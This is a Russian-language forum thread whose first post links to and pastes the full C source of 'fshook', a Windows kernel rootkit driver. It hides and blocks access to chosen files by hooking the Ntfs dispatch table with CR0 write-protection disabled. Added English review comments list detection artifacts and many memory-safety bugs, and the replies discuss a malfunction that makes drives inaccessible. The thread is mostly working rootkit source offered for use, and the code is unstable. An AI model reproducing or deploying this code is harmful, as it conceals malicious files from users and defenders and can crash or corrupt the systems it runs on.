Скачал с http://hellknights.void.ru/ написанный руткит для сокрытия файлов "fshook by Cr4sh". http://hellknights.void.ru/releases/fshook.rar Код (Text):
/*
 * Review notes on the posted listing (code left as posted, comments added).
 *
 * This is a Windows kernel-mode driver that hides files by patching the
 * dispatch table of the Ntfs driver object: DriverEntry looks up
 * "\FileSystem\Ntfs" and swaps its IRP_MJ_CREATE and IRP_MJ_DIRECTORY_CONTROL
 * MajorFunction entries for NewCreate / NewDirectoryControl after clearing
 * CR0.WP with inline x86 asm.  A user-mode client adds/removes "protected"
 * names through IOCTL_PROTECT_FILE on the control device.
 *
 * Detection / forensic artifacts that follow directly from this code:
 *   - MajorFunction[IRP_MJ_CREATE] and [IRP_MJ_DIRECTORY_CONTROL] of the Ntfs
 *     driver object point into this driver's image instead of ntfs.sys
 *     (visible in a kernel debugger or any dispatch-table integrity check).
 *   - A named device and \DosDevices link derived from DEVICE_NAME (drvcomm.h).
 *   - CR0.WP is toggled and interrupts are disabled (cli/sti) on hook/unhook.
 *   - Only the Ntfs driver object is patched; other file systems are untouched,
 *     and only four FILE_INFORMATION_CLASS values are filtered (see
 *     NewDirectoryControl), so a cross-view comparison shows the hidden entries.
 *
 * The listing is x86-32 only: pointers are round-tripped through ULONG
 * (r_next/r_prev, *(ULONG*)&pFileInfo, the InterlockedExchange casts) and the
 * asm uses eax/cr0.
 */
#include <stdio.h>
#include <ntddk.h>
#include "debug.h"      // DbgMsg()
#include "undocnt.h"    // ObReferenceObjectByName, PQUERY_DIRECTORY, ...
#include "drvcomm.h"    // DEVICE_NAME, IOCTL_PROTECT_FILE, REQUEST_BUFFER, PROTECT_RULE

// kernel export: object type used to look up driver objects by name
extern PVOID IoDriverObjectType;

PPROTECT_RULE PrtFindRule(PWSTR object);

// driver object of \FileSystem\Ntfs whose dispatch table is patched
PDRIVER_OBJECT pTargetDrvObj;
// NOTE(review): both strings are initialised in DriverEntry over buffers that
// are locals of DriverEntry, yet dos_dev_name is used again in DriverUnload.
UNICODE_STRING dos_dev_name, dev_name;

typedef NTSTATUS (__stdcall * IRP_FUNC)( PDEVICE_OBJECT DeviceObject, PIRP Irp );

// guards the r_first/r_last rule list
KMUTEX RulesMutex;
// original Ntfs dispatch entries saved by DriverEntry, restored by DriverUnload
IRP_FUNC OldCreate;
IRP_FUNC OldDirectoryControl;

//--------------------------------------------------------------------------------------
/*
 * Process_Dir - post-process a completed IRP_MN_QUERY_DIRECTORY result buffer of
 * FILE_DIRECTORY_INFORMATION entries and unlink the entries whose full path
 * matches a rule (PrtFindRule).
 *
 * pDirName: directory path copied out of the FileObject by NewDirectoryControl.
 * pInf:     first entry of the result buffer (Irp->UserBuffer); entries are
 *           chained by NextEntryOffset, 0 ends the chain.
 * Returns STATUS_SUCCESS, or STATUS_NO_SUCH_FILE when the first entry matched
 * and has no successor.
 *
 * What the match branches write (code unchanged):
 *   - previous entry exists, current has a successor: the previous entry's
 *     NextEntryOffset is increased by the current one's.
 *   - previous entry exists, current is last: the first ULONG of the buffer
 *     (pInf->NextEntryOffset) is set to 0 and the routine returns.
 *   - current is the first entry and has a successor: its own NextEntryOffset
 *     is added to itself.
 *
 * Review observations (memory safety):
 *   - pPrevFileInfo is never initialised; it is read in the first iteration.
 *   - the wcsncat bound mixes units: sizeof(FullPath) is a byte count while
 *     wcslen() and FileNameLength / 2 count wchar_t, so the limit exceeds the
 *     buffer.
 *   - wcscpy(FullPath, pDirName) is unbounded, and the caller does not
 *     guarantee that pDirName is NUL-terminated.
 */
NTSTATUS Process_Dir(wchar_t *pDirName, PFILE_DIRECTORY_INFORMATION pInf)
{
    NTSTATUS ns = STATUS_SUCCESS;
    wchar_t FullPath[255];
    PFILE_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

    while (pFileInfo)
    {
        // FullPath = pDirName [+ "\"] + FileName (FileNameLength is in bytes)
        RtlZeroMemory(FullPath, sizeof(FullPath));
        wcscpy(FullPath, pDirName);
        if (pDirName[wcslen(pDirName) - 1] != '\\')
            wcscat(FullPath, L"\\");
        wcsncat(FullPath, pFileInfo->FileName, min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

        if (PrtFindRule(FullPath))
        {
            DbgMsg("%S - PROTECTED\n", FullPath);
            if (pPrevFileInfo)
            {
                if (pFileInfo->NextEntryOffset)
                {
                    pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;
                }
                else
                {
                    // writes to the first entry of the buffer, not to pPrevFileInfo
                    *(PULONG)pInf = 0;
                    return ns;
                }
            }
            else
            {
                if (pFileInfo->NextEntryOffset)
                {
                    *(PULONG)pInf += pFileInfo->NextEntryOffset;
                }
                else
                {
                    ns = STATUS_NO_SUCH_FILE;
                }
            }
        }

        // advance: byte offset applied through a 32-bit integer alias of the pointer
        if (pFileInfo->NextEntryOffset)
        {
            pPrevFileInfo = pFileInfo;
            *(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;
        }
        else
        {
            pFileInfo = NULL;
        }
    }

    return ns;
}

//--------------------------------------------------------------------------------------
/*
 * Process_Full - same walk and same write-backs as Process_Dir, for
 * FILE_FULL_DIRECTORY_INFORMATION entries.  The review observations on
 * Process_Dir (uninitialised pPrevFileInfo, byte/wchar_t unit mismatch in the
 * wcsncat bound, unbounded wcscpy) apply unchanged.
 */
NTSTATUS Process_Full(wchar_t *pDirName, PFILE_FULL_DIRECTORY_INFORMATION pInf)
{
    NTSTATUS ns = STATUS_SUCCESS;
    wchar_t FullPath[255];
    PFILE_FULL_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

    while (pFileInfo)
    {
        RtlZeroMemory(FullPath, sizeof(FullPath));
        wcscpy(FullPath, pDirName);
        if (pDirName[wcslen(pDirName) - 1] != '\\')
            wcscat(FullPath, L"\\");
        wcsncat(FullPath, pFileInfo->FileName, min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

        if (PrtFindRule(FullPath))
        {
            DbgMsg("%S - PROTECTED\n", FullPath);
            if (pPrevFileInfo)
            {
                if (pFileInfo->NextEntryOffset)
                {
                    pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;
                }
                else
                {
                    *(PULONG)pInf = 0;
                    return ns;
                }
            }
            else
            {
                if (pFileInfo->NextEntryOffset)
                {
                    *(PULONG)pInf += pFileInfo->NextEntryOffset;
                }
                else
                {
                    ns = STATUS_NO_SUCH_FILE;
                }
            }
        }

        if (pFileInfo->NextEntryOffset)
        {
            pPrevFileInfo = pFileInfo;
            *(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;
        }
        else
        {
            pFileInfo = NULL;
        }
    }

    return ns;
}

//--------------------------------------------------------------------------------------
/*
 * Process_Both - same walk and same write-backs as Process_Dir, for
 * FILE_BOTH_DIRECTORY_INFORMATION entries.  Same review observations.
 */
NTSTATUS Process_Both(wchar_t *pDirName, PFILE_BOTH_DIRECTORY_INFORMATION pInf)
{
    NTSTATUS ns = STATUS_SUCCESS;
    wchar_t FullPath[255];
    PFILE_BOTH_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

    while (pFileInfo)
    {
        RtlZeroMemory(FullPath, sizeof(FullPath));
        wcscpy(FullPath, pDirName);
        if (pDirName[wcslen(pDirName) - 1] != '\\')
            wcscat(FullPath, L"\\");
        wcsncat(FullPath, pFileInfo->FileName, min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

        if (PrtFindRule(FullPath))
        {
            DbgMsg("%S - PROTECTED\n", FullPath);
            if (pPrevFileInfo)
            {
                if (pFileInfo->NextEntryOffset)
                {
                    pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;
                }
                else
                {
                    *(PULONG)pInf = 0;
                    return ns;
                }
            }
            else
            {
                if (pFileInfo->NextEntryOffset)
                {
                    *(PULONG)pInf += pFileInfo->NextEntryOffset;
                }
                else
                {
                    ns = STATUS_NO_SUCH_FILE;
                }
            }
        }

        if (pFileInfo->NextEntryOffset)
        {
            pPrevFileInfo = pFileInfo;
            *(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;
        }
        else
        {
            pFileInfo = NULL;
        }
    }

    return ns;
}

//--------------------------------------------------------------------------------------
/*
 * Process_Names - same walk and same write-backs as Process_Dir, for
 * FILE_NAMES_INFORMATION entries.  Same review observations.
 */
NTSTATUS Process_Names(wchar_t *pDirName, PFILE_NAMES_INFORMATION pInf)
{
    NTSTATUS ns = STATUS_SUCCESS;
    wchar_t FullPath[255];
    PFILE_NAMES_INFORMATION pPrevFileInfo, pFileInfo = pInf;

    while (pFileInfo)
    {
        RtlZeroMemory(FullPath, sizeof(FullPath));
        wcscpy(FullPath, pDirName);
        if (pDirName[wcslen(pDirName) - 1] != '\\')
            wcscat(FullPath, L"\\");
        wcsncat(FullPath, pFileInfo->FileName, min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

        if (PrtFindRule(FullPath))
        {
            DbgMsg("%S - PROTECTED\n", FullPath);
            if (pPrevFileInfo)
            {
                if (pFileInfo->NextEntryOffset)
                {
                    pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;
                }
                else
                {
                    *(PULONG)pInf = 0;
                    return ns;
                }
            }
            else
            {
                if (pFileInfo->NextEntryOffset)
                {
                    *(PULONG)pInf += pFileInfo->NextEntryOffset;
                }
                else
                {
                    ns = STATUS_NO_SUCH_FILE;
                }
            }
        }

        if (pFileInfo->NextEntryOffset)
        {
            pPrevFileInfo = pFileInfo;
            *(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;
        }
        else
        {
            pFileInfo = NULL;
        }
    }

    return ns;
}

//--------------------------------------------------------------------------------------
/*
 * NewCreate - replacement for the Ntfs driver's IRP_MJ_CREATE dispatch entry.
 * If the FileObject and its FileName.Buffer pass MmIsAddressValid and the name
 * matches a rule, the open is refused with STATUS_UNSUCCESSFUL; otherwise the
 * IRP goes to the saved original handler (OldCreate).
 *
 * Review observations: the refusing path returns a status without completing
 * the IRP (no IoCompleteRequest); FileName is a counted UNICODE_STRING whose
 * Buffer need not be NUL-terminated, yet it is printed with %S and handed to
 * wcslen-based matching; MmIsAddressValid only says the page is resident, not
 * that the pointer is meaningful.
 */
NTSTATUS __stdcall NewCreate(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);

    if (MmIsAddressValid(stack->FileObject))
    {
        if (MmIsAddressValid(stack->FileObject->FileName.Buffer))
        {
            DbgMsg("IRP_MJ_CREATE : %S\n", stack->FileObject->FileName.Buffer);
            if (PrtFindRule(stack->FileObject->FileName.Buffer))
                return STATUS_UNSUCCESSFUL;
        }
    }

    return OldCreate(DeviceObject, Irp);
}

//--------------------------------------------------------------------------------------
/*
 * NewDirectoryControl - replacement for the Ntfs IRP_MJ_DIRECTORY_CONTROL entry.
 * For IRP_MN_QUERY_DIRECTORY it copies the directory name out of the
 * FileObject, calls the original handler and, if that returned STATUS_SUCCESS,
 * rewrites the result buffer (Irp->UserBuffer) with the Process_* routine for
 * FileInformationClass.  Other minor functions, other information classes and
 * invalid-looking FileObjects are forwarded unchanged.
 *
 * Review observations (code unchanged):
 *   - the wcsncpy count is min(sizeof(DirName), FileName.Length): both are byte
 *     counts but wcsncpy counts wchar_t, and DirName is never explicitly
 *     NUL-terminated before being passed on.
 *   - the lower driver is assumed to complete synchronously; STATUS_PENDING is
 *     simply returned and the buffer is never revisited.
 *   - Irp->UserBuffer is accessed directly in the caller's context.
 *   - PQUERY_DIRECTORY (undocnt.h) is overlaid on stack->Parameters.
 *   - only the four listed classes are filtered; any other class (the FileId*
 *     variants, for instance) returns unfiltered results.
 */
NTSTATUS __stdcall NewDirectoryControl(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    NTSTATUS ns;
    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
    PQUERY_DIRECTORY QueryDir = (PQUERY_DIRECTORY)&stack->Parameters;
    FILE_INFORMATION_CLASS FileInformationClass = QueryDir->FileInformationClass;
    wchar_t DirName[255];

    if (stack->MinorFunction == IRP_MN_QUERY_DIRECTORY)
    {
        if (MmIsAddressValid(stack->FileObject))
        {
            if (MmIsAddressValid(stack->FileObject->FileName.Buffer))
            {
                DbgMsg("IRP_MJ_DIRECTORY_CONTROL : %S (FileInformationClass: %d)\n", stack->FileObject->FileName.Buffer, FileInformationClass);
                wcsncpy(DirName, stack->FileObject->FileName.Buffer, min(sizeof(DirName), stack->FileObject->FileName.Length));

                // let Ntfs fill the buffer first, then filter it
                ns = OldDirectoryControl(DeviceObject, Irp);
                if (ns == STATUS_SUCCESS)
                {
                    switch (FileInformationClass)
                    {
                    case FileDirectoryInformation:
                        return Process_Dir(DirName, (PFILE_DIRECTORY_INFORMATION)Irp->UserBuffer);
                    case FileFullDirectoryInformation:
                        return Process_Full(DirName, (PFILE_FULL_DIRECTORY_INFORMATION)Irp->UserBuffer);
                    case FileBothDirectoryInformation:
                        return Process_Both(DirName, (PFILE_BOTH_DIRECTORY_INFORMATION)Irp->UserBuffer);
                    case FileNamesInformation:
                        return Process_Names(DirName, (PFILE_NAMES_INFORMATION)Irp->UserBuffer);
                    }
                }
                return ns;
            }
        }
    }

    return OldDirectoryControl(DeviceObject, Irp);
}

//--------------------------------------------------------------------------------------
/*
 * r_wcsncmp - suffix comparison used for rule matching.
 * For i in [0, min(len1, len2)) it compares str1[len1 - i] with
 * str2[len2 - i], i.e. it walks both strings backwards starting at the index
 * of the terminating NUL.  Returns 0 at the first mismatch, otherwise the
 * number of positions compared (min(len1, len2)).
 * NOTE(review): the reply in the thread points at this routine as the place
 * to look for the reported behaviour; the loop bounds above are what the code
 * actually does, not what the original comment describes.
 */
// compare two strings from the end (returns number of equal characters)
unsigned int r_wcsncmp(wchar_t *str1, wchar_t *str2)
{
    unsigned int i, len1 = wcslen(str1), len2 = wcslen(str2);

    for (i = 0; i < min(len1, len2); i++)
    {
        if (str1[len1-i] != str2[len2-i])
            return 0;
    }

    return i;
}

//--------------------------------------------------------------------------------------
// first and last rules in list (doubly linked, links stored as ULONG in PROTECT_RULE)
PPROTECT_RULE r_first = NULL, r_last = NULL;

/*
 * PrtFindRule - linear search of the rule list for a rule whose name matches
 * `object` according to r_wcsncmp (non-zero result).  Holds RulesMutex for the
 * walk and releases it in __finally.  Returns the rule, or NULL when nothing
 * matches or the mutex wait fails.
 *
 * Review observations: r_first is read into `r` before the mutex is acquired;
 * PrtAddRule/PrtDelRule call this while already owning RulesMutex, which only
 * works because a KMUTEX can be re-acquired by its owning thread; the routine
 * is also reached from the Ntfs dispatch hooks, so it blocks on a dispatcher
 * object inside the file system's dispatch path (IRQL must allow it — confirm).
 */
// find rule by type and object name
PPROTECT_RULE PrtFindRule(PWSTR object)
{
    PPROTECT_RULE r = r_first;
    NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);
    if (!NT_SUCCESS(ns))
    {
        DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);
        return NULL;
    }

    __try
    {
        while (r)
        {
            if (r_wcsncmp(r->name, object))
                __leave;    // r is the match
            r = (PPROTECT_RULE)r->r_next;
        }
        r = NULL;
    }
    __finally
    {
        KeReleaseMutex(&RulesMutex, FALSE);
    }

    return r;
}

//--------------------------------------------------------------------------------------
/*
 * PrtDelRule - remove and free the rule matching `object`.
 * Unlinks it from the list (r_prev/r_next are ULONG-encoded pointers), fixes
 * r_first/r_last and calls ExFreePool.  Returns TRUE when a rule was deleted,
 * FALSE when none matched or the mutex wait failed.
 *
 * Review observation: the "deleted!" DbgMsg has two conversions (0x%.8x and
 * %S) but a single argument.
 */
// delete some rule
BOOLEAN PrtDelRule(PWSTR object)
{
    BOOLEAN bRet = FALSE;
    PPROTECT_RULE r;
    NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);
    if (!NT_SUCCESS(ns))
    {
        DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);
        return bRet;
    }

    __try
    {
        // recursive acquisition of RulesMutex by the same thread
        r = PrtFindRule(object);
        if (r == NULL)
        {
            DbgMsg("PrtDelRule() : Rule not found\n");
            __leave;
        }

        if (r->r_prev)
            ((PPROTECT_RULE)(r->r_prev))->r_next = r->r_next;
        if (r->r_next)
            ((PPROTECT_RULE)(r->r_next))->r_prev = r->r_prev;
        if (r_first == r)
            r_first = (PPROTECT_RULE)r->r_next;
        if (r_last == r)
            r_last = (PPROTECT_RULE)r->r_prev;

        DbgMsg("PrtDelRule() : 0x%.8x deleted! (object name: %S)\n", object);
        ExFreePool(r);
        bRet = TRUE;
    }
    __finally
    {
        KeReleaseMutex(&RulesMutex, FALSE);
    }

    return bRet;
}

//--------------------------------------------------------------------------------------
/*
 * PrtAddRule - append a rule for `object` unless one already matches.
 * Allocates a zeroed PROTECT_RULE from NonPagedPool, copies at most 255
 * wchar_t of the name and links it at the tail of the list.  Returns TRUE
 * when a rule was added.
 *
 * Review observations: the size of r->name is declared in a header not shown
 * here, so whether 255 fits and whether the copy stays NUL-terminated cannot
 * be confirmed from this file; `object` comes from the IOCTL SystemBuffer and
 * wcslen(object) is not bounded by any caller-supplied length.
 */
// create new rule
BOOLEAN PrtAddRule(PWSTR object)
{
    BOOLEAN bRet = FALSE;
    PPROTECT_RULE r;
    NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);
    if (!NT_SUCCESS(ns))
    {
        DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);
        return FALSE;
    }

    __try
    {
        // already exists...
        r = PrtFindRule(object);
        if (r)
        {
            DbgMsg("PrtAddRule() : Allready exists\n");
            __leave;
        }

        r = (PPROTECT_RULE)ExAllocatePool(NonPagedPool, sizeof(PROTECT_RULE));
        if (r == NULL)
        {
            DbgMsg("ExAllocatePool() ERROR\n");
            __leave;
        }

        RtlZeroMemory(r, sizeof(PROTECT_RULE));
        wcsncpy(r->name, object, min(wcslen(object), 255));

        // link at tail; links are stored as ULONG (32-bit pointers)
        if (r_last)
        {
            r_last->r_next = (ULONG)r;
            r->r_prev = (ULONG)r_last;
            r_last = r;
        }
        else
        {
            r_last = r_first = r;
        }

        DbgMsg("PrtAddRule() : Rule added! (object name: %S)\n", object);
        bRet = TRUE;
    }
    __finally
    {
        KeReleaseMutex(&RulesMutex, FALSE);
    }

    return bRet;
}

//--------------------------------------------------------------------------------------
/*
 * DeviceControlRoutine - dispatch routine of the control device (installed for
 * IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL; the first two just
 * complete with STATUS_SUCCESS).  For IRP_MJ_DEVICE_CONTROL the buffered-I/O
 * SystemBuffer is treated as REQUEST_BUFFER (drvcomm.h): IOCTL_PROTECT_FILE
 * adds or removes a rule depending on protect_object.active and reports the
 * result in buf_res->status; any other code returns
 * STATUS_INVALID_DEVICE_REQUEST.
 *
 * Review observations (code unchanged):
 *   - neither InputBufferLength nor OutputBufferLength is compared with
 *     sizeof(REQUEST_BUFFER) before SystemBuffer is dereferenced, and the
 *     default branch writes buf_res->status even when no buffer was supplied.
 *   - IoStatus.Information is set to sizeof(REQUEST_BUFFER) regardless of the
 *     caller's output buffer size.
 *   - Irp->IoStatus.Status is written after IoCompleteRequest has been called.
 *   - ret and notify_irp are unused.
 */
// Driver dispatch
NTSTATUS DeviceControlRoutine(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    PIO_STACK_LOCATION stack;
    NTSTATUS ns = STATUS_SUCCESS;
    ULONG code, ret = 0;
    PIRP notify_irp;
    PREQUEST_BUFFER buf_req, buf_res;

    Irp->IoStatus.Status = ns;
    Irp->IoStatus.Information = 0;
    stack = IoGetCurrentIrpStackLocation(Irp);

    if (stack->MajorFunction == IRP_MJ_DEVICE_CONTROL)
    {
        code = stack->Parameters.DeviceIoControl.IoControlCode;
        // METHOD_BUFFERED: input and output share SystemBuffer
        buf_req = buf_res = (PREQUEST_BUFFER)Irp->AssociatedIrp.SystemBuffer;
        DbgMsg("IRP_MJ_DEVICE_CONTROL : 0x%.8x\n", code);
        Irp->IoStatus.Information = sizeof(REQUEST_BUFFER);

        switch (code)
        {
        case IOCTL_PROTECT_FILE:
            if (buf_req->protect_object.active)
            {
                buf_res->status = PrtAddRule(buf_req->protect_object.name);
            }
            else
            {
                buf_res->status = PrtDelRule(buf_req->protect_object.name);
            }
            break;

        default:
            ns = STATUS_INVALID_DEVICE_REQUEST;
            buf_res->status = 0;
            Irp->IoStatus.Information = 0;
            break;
        }
    }

    if (ns != STATUS_PENDING)
    {
        IoCompleteRequest(Irp, IO_NO_INCREMENT);
        Irp->IoStatus.Status = ns;
    }

    return ns;
}

//--------------------------------------------------------------------------------------
/*
 * DriverUnload - puts the two saved Ntfs dispatch entries back (same CR0.WP /
 * cli-sti sequence as DriverEntry), then deletes the control device and the
 * symbolic link.
 *
 * Review observations: declared NTSTATUS although DRIVER_UNLOAD is a VOID
 * routine; the object reference on pTargetDrvObj taken by
 * ObReferenceObjectByName in DriverEntry is never dropped; rules allocated by
 * PrtAddRule are not freed; dos_dev_name still points at a buffer that was a
 * local of DriverEntry; nothing waits for threads that may still be executing
 * NewCreate/NewDirectoryControl when the image is unloaded.
 */
// unload function
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgMsg("DriverUnload()\n");

    // disable interrupts and clear CR0.WP so the dispatch table can be written
    __asm
    {
        cli
        mov eax,cr0
        and eax,not 000010000h
        mov cr0,eax
    }

    InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_CREATE], (ULONG)OldCreate);
    InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_DIRECTORY_CONTROL], (ULONG)OldDirectoryControl);

    // restore CR0.WP, re-enable interrupts
    __asm
    {
        mov eax,cr0
        or eax,000010000h
        mov cr0,eax
        sti
    }

    DbgMsg("IRP_MJ_CREATE: Restored to 0x%.8x\n", OldCreate);
    DbgMsg("IRP_MJ_DIRECTORY_CONTROL: Restored to 0x%.8x\n", OldDirectoryControl);

    IoDeleteDevice(DriverObject->DeviceObject);
    IoDeleteSymbolicLink(&dos_dev_name);

    return STATUS_SUCCESS;
}

//--------------------------------------------------------------------------------------
/*
 * DriverEntry - creates the control device "\Device\<DEVICE_NAME>" and its
 * "\DosDevices\<DEVICE_NAME>" link, routes CREATE/CLOSE/DEVICE_CONTROL to
 * DeviceControlRoutine (buffered I/O), initialises RulesMutex, then references
 * the "\FileSystem\Ntfs" driver object by name (ObReferenceObjectByName from
 * undocnt.h) and installs the two hooks with InterlockedExchange on its
 * MajorFunction table while CR0.WP is cleared and interrupts are disabled.
 * Returns the first failing status, STATUS_SUCCESS otherwise.
 *
 * Review observations (code unchanged):
 *   - the globals dev_name/dos_dev_name are initialised with
 *     RtlInitUnicodeString over wc_dev_name/wc_dos_dev_name, which are locals
 *     of this function; DriverUnload uses dos_dev_name after they are gone.
 *   - when ObReferenceObjectByName fails the device and symbolic link created
 *     above are left in place.
 *   - no security descriptor is applied to the device in this file; who may
 *     open it and issue IOCTL_PROTECT_FILE depends on the defaults — confirm.
 *   - RegistryPath is unused.
 */
// main driver function
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
    NTSTATUS ns = STATUS_SUCCESS;
    UNICODE_STRING DevName;
    wchar_t wc_dev_name[512], wc_dos_dev_name[512];
    PDEVICE_OBJECT dev_obj;

    DbgMsg("DriverEntry()\n");

    DriverObject->DriverUnload = DriverUnload;

    // device / link names; DEVICE_NAME comes from drvcomm.h
    swprintf(wc_dev_name, L"\\Device\\%s", DEVICE_NAME);
    swprintf(wc_dos_dev_name, L"\\DosDevices\\%s", DEVICE_NAME);
    RtlInitUnicodeString(&dev_name, wc_dev_name);
    RtlInitUnicodeString(&dos_dev_name, wc_dos_dev_name);

    ns = IoCreateDevice(DriverObject, 0, &dev_name, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &dev_obj);
    if (NT_SUCCESS(ns))
    {
        DriverObject->MajorFunction[IRP_MJ_CREATE] =
        DriverObject->MajorFunction[IRP_MJ_CLOSE] =
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DeviceControlRoutine;
        dev_obj->Flags |= DO_BUFFERED_IO;

        // drop a stale link from a previous load, then create ours
        IoDeleteSymbolicLink(&dos_dev_name);
        ns = IoCreateSymbolicLink(&dos_dev_name, &dev_name);
        if (!NT_SUCCESS(ns))
        {
            DbgMsg("IoCreateSymbolicLink() fails : 0x%.8x\n", ns);
            IoDeleteDevice(DriverObject->DeviceObject);
            return ns;
        }
    }
    else
    {
        DbgMsg("IoCreateDevice() fails : 0x%.8x\n", ns);
        return ns;
    }

    KeInitializeMutex(&RulesMutex, 0);

    // locate the Ntfs driver object whose dispatch table will be patched
    RtlInitUnicodeString(&DevName, L"\\FileSystem\\Ntfs");
    ns = ObReferenceObjectByName(&DevName, OBJ_CASE_INSENSITIVE, NULL, 0, (POBJECT_TYPE)IoDriverObjectType, KernelMode, NULL, &pTargetDrvObj);
    if (!NT_SUCCESS(ns))
    {
        DbgMsg("ObReferenceObjectByName() fails : 0x%.8x\n", ns);
        return ns;
    }

    // disable interrupts and clear CR0.WP so the dispatch table can be written
    __asm
    {
        cli
        mov eax,cr0
        and eax,not 000010000h
        mov cr0,eax
    }

    OldCreate = (IRP_FUNC)InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_CREATE], (ULONG)NewCreate);
    OldDirectoryControl = (IRP_FUNC)InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_DIRECTORY_CONTROL], (ULONG)NewDirectoryControl);

    // restore CR0.WP, re-enable interrupts
    __asm
    {
        mov eax,cr0
        or eax,000010000h
        mov cr0,eax
        sti
    }

    DbgMsg("IRP_MJ_CREATE: Old func 0x%.8x; New func 0x%.8x\n", OldCreate, NewCreate);
    DbgMsg("IRP_MJ_DIRECTORY_CONTROL: Old func 0x%.8x; New func 0x%.8x\n", OldDirectoryControl, NewDirectoryControl);

    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------------------------
// EoF
У меня возникла такая проблема при его использовании: - устанавливаю, и делаю все так, как написано в readme - скрываю какой либо файл "control.exe dll_load.exe" просле этого при обращении к какому либо диску вижу диалоговое окно ---------------------------------- Нет доступа к С:\ Параметр задан неверно ---------------------------------- если снимаю скрытие "control.exe dll_load.exe /d" то обрашение к дискам востонавливается система xp sp2 Сам автор на вопрос по ICQ пока не ответил. Может кто пользовался, или знает в чем проблема?
смотри функцию поиска рулесов и будет тебе счастье (смотреть удобно в выньдебаге с отладкой по сорцу, иначе не поймешь)
просто вообще не разбирался с драйверами-фильтрами файловых систем! думал, сразу раз — и заработает! думал, может у кого была такая же проблема! ок, читаю, разбираюсь! Всем спасибо!